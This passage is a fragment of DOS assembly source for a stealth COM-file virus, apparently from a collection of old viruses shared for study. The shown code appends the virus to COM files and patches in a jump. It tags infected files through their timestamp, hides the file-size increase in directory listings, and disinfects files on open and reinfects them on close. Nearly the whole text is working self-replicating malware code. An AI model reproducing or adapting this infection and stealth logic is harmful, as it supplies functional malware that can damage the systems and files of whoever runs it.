mlp1307b.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

		int     21h                     ;Get attributes.
		
		jnc     got_attributes
		retn
got_attributes:                
		push    cx
		xor     cx,cx
		mov     ax,4301h
		int     21h                     ;Zoink attributes.
		
		mov     ax,3D02h
		mov     dx,609h
		pushf                           ;Open file in read/write mode.
		
		push    cs
		call    call_dos

		mov     bx,ax                   ;Handle to BX

		mov     ax,5700h
		int     21h                     ;Get file date/time.
		
		push    dx
		push    cx
		and     cl,1Fh
		cmp     cl,0Ah
		jne     continue_infect

		mov     dx,offset exit_infect
		jmp     dx
continue_infect:
		mov     ah,3Fh
		mov     cx,3
		mov     dx,offset restore_bytes
		int     21h                     ;Read first three bytes.
		
		mov     ax,4202h
		xor     dx,dx
		xor     cx,cx
		int     21h                     ;Seek to EOF
		
		sub     ax,3

		mov     jmp_data,ax
		mov     ah,40h
		mov     dx,100h
		mov     cx,virussize
		int     21h                     ;Append virus to file.
		
		mov     ax,4200h
		xor     dx,dx
		xor     cx,cx
		int     21h                     ;Seek to start.
		
		mov     ah,40h
		mov     cx,3
		mov     dx,offset jmp_op
		int     21h                     ;Overwrite with JMP

exit_infect:
		pop     cx
		pop     dx
		and     cl,0E0h
		or      cl,0Ah
		mov     ax,5701h
		int     21h                     ;Givvit the special date/time
						;already-infected type
						;designation treatment..

		
		mov     ah,3Eh
		pushf
		push    cs
		call    call_dos                ;CL00000000SE 'r up!

		mov     ax,4301h
		mov     dx,offset filename
		pop     cx
		int     21h                     ;Restore kuhl attribs..
		
		ret

handle_stealth:
		pop     bp
		popf
		pushf
		push    cs
		call    call_dos
		jnc     handle_match_found
		retf    2
handle_match_found:                
		pushf
		push    ax
		push    bx
		push    cx
		push    dx
		push    si
		push    di
		push    ds
		push    es
		push    bp                      ;Push the lot.
		mov     ah,2Fh
		int     21h                     ;Get DTA
		
		push    es
		pop     ds                      ;DS:BX points to DTA.
		mov     si,bx                   ;DS:SI points to DTA.

		push    cs
		pop     es

		add     si,1Eh                  ;1eh is start of filename
						;within the DTA struct.
		mov     di,offset filename
		mov     cx,25

copyloop:                
		lodsb
		cmp     al,0
		je      end_copy                ;Copy filename to buffer.
		stosb
		loop    copyloop

end_copy:                
		mov     al,0
		stosb                           ;Make it a valid ASCIIZ
						;string.
		push    ds
		pop     es
		push    cs
		pop     ds
		
		mov     si,di
		sub     si,4                    ;Assume extension is three
						;characters.

		lodsw 
		cmp     ax,'OC'
		je      starts_with_co
		cmp     ax,'oc'
		jne     no_handle_stealth
starts_with_co:                
		lodsb
		cmp     al,'m'
		je      com_file
		cmp     al,'M'
		jne     no_handle_stealth
com_file:                
		push    es
		pop     ds
		mov     si,bx
		add     si,1Ch                  ;High word of filesize.
		lodsw
		cmp     ax,0                    ;COM file -> not bigger
						;than 64 kb -> highword
						;=0. Just an additional
						;check. but OR AX,AX?
						;Cuz n0t!
		jne     no_handle_stealth

		mov     si,bx
		add     si,16h                  ;File time.
		lodsw
		and     al,1Fh
		cmp     al,0Ah
		jne     no_handle_stealth

		mov     si,bx
		add     si,1Ah                  ;Low word of filesize.
		
		mov     di,si
		lodsw
		sub     ax,cs:virussize
		jz      no_handle_stealth
		stosw
no_handle_stealth:
		pop     bp
		pop     es
		pop     ds
		pop     di
		pop     si
		pop     dx
		pop     cx
		pop     bx
		pop     ax
		popf
		retf    2

file_open:
		pop     bp
		push    ax
		push    bx
		push    cx
		push    dx
		push    si
		push    di
		push    bp
		push    ds
		push    es                      ;Save some regs.
		
		mov     al,'.'
		push    ds
		pop     es
		mov     di,dx                   ;ES:DI points to filename.
		
		mov     cx,32h
		repne   scasb                   ;Scan for '.'
		mov     si,di
		lodsw
		cmp     ax,'OC'
		je      pffff_this_is_boring
		cmp     ax,'oc'
		je      pffff_this_is_boring
		
		mov     dx,offset exit_disinfect
		jmp     dx

pffff_this_is_boring:                
		lodsb
		cmp     al,'m'
		je      try_disinfect
		cmp     al,'M'
		jne     exit_disinfect
try_disinfect:
		mov     ax,3D02h
		pushf
		push    cs
		call    call_dos                ;Open file in read/write
						;mode.
		jc      exit_disinfect

		mov     bx,ax                   ;Handle to BX.

		push    cs
		pop     ds
		push    cs
		pop     es
		mov     ax,5700h
		int     21h                     ;Get file date/time.
		
		and     cl,1Fh
		cmp     cl,0Ah
		jne     exit_disinfect
		mov     ax,4202h
		xor     dx,dx
		xor     cx,cx                   ;CWD? naaaaaaaah!
		int     21h                     ;Seek to EOF
		
		push    ax
		sub     ax,3                    ;Filesize-3
		mov     dx,ax
		mov     ax,4200h
		mov     cx,0
		int     21h                     ;Seek to EOF-3.
		
		mov     ah,3Fh
		mov     cx,3
		mov     dx,offset buf
		int     21h
		
		mov     ax,4200h
		xor     cx,cx
		xor     dx,dx                   ;Boooooriiing.
		int     21h                     ;Seek to BOF BOF BOF.
		
		mov     ah,40h
		mov     cx,3
		mov     dx,offset buf
		int     21h
		
		pop     dx
		sub     dx,virussize
		mov     ax,4200h
		mov     cx,0
		int     21h                     ;Seek to EOF-virussize.
		
		mov     ah,40h
		mov     cx,0
		int     21h                     ;Truncate file.
		
		mov     ah,3Eh
		pushf
		push    cs
		call    call_dos                ;close file.
exit_disinfect:
		pop     es
		pop     ds
		pop     bp
		pop     di
		pop     si
		pop     dx
		pop     cx
		pop     bx
		pop     ax
		popf
		pushf
		push cs
		call    call_dos
		retf    2

file_close:
		pop     bp
		push    ax
		push    bx
		push    cx
		push    dx
		push    si
		push    di
		push    bp
		push    ds
		push    es                      ;Hmpf. I suppose nobody
						;knows what subroutines
						;are these days..

		mov     ax,1220h
		int     2Fh 
		mov     bl,es:[di]
		mov     ax,1216h
		int     2Fh                     ;Awright, grabbed SFT ptr.
		
		mov     bp,di
		add     di,28h                  ;File extension.
		
		push    es
		pop     ds
		mov     si,di
		lodsw
		cmp     ax,'OC'                 ;AAARRRGGHh wibble wibble!
						;I can't take much more
						;of diiizzzzzzzzzzzz..
		jne     exit_disinfect
		lodsb
		cmp     al,'M'
		jne     exit_disinfect
		
		mov     si,bp
		add     si,20h                  ;Filename.
		push    cs
		pop     es
		call    try_infect              ;HUUUH? A SUBROUTINE?
		jmp     short exit_disinfect

get_random:
		push    dx
		push    cx
		push    bx
		in      al,40h                  ;Timer data.
		add     ax,0
		mov     dx,0
		mov     cx,7

randomloop:                
		shl     ax,1                    ; Shift w/zeros fill
		rcl     dx,1                    ; Rotate thru carry
		mov     bl,al
		xor     bl,dh
		jns     no_sign
		inc     al
no_sign:                
		loop    randomloop

		pop     bx
		mov     al,dl
		pop     cx
		pop     dx
		retn

anoi            db      '>>>  A.N.O.I  <<<'

buf             db      3 dup (0)

virussize       dw      (endvirus-start)

parasize        dw      'd'

something       db      '                                '
		db      '                                '
		db      '                '

filename        db      12 dup (0)

jmp_op          db      0E9h
jmp_data        dw      0
restore_bytes   db      90h
		db      0CDh, 20h
endvirus:

		end     start